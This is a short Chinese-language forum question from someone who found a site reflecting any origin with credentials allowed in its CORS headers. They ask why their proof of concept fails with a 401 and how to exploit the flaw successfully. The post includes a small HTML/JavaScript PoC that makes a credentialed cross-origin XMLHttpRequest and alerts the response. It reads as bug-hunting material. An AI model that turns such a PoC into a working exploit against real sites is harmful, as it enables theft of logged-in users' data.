基本上在此网站上,我发现某个请求的响应具有 access-control-allow-origin :(无论我将哪个站点作为请求源) 访问控制允许凭证:true 但是当我打开一个通用的概念证明时,由于缺少身份验证和状态401 ..,我最终会收到一个错误。 (如何成功利用CORS?)
access-control-expose-headers:WWW-Authenticate,Server-Authorization也在响应中。
我尝试过
<html>
<script>
var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','[redacted]',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
</script>
</html>
作为概念证明,它不起作用,因为它只会给我一个错误的缺少身份验证消息的消息。
当我打开概念证明时,它会提供状态401作为缺少的身份验证消息...
这是什么问题,我如何成功利用CORS?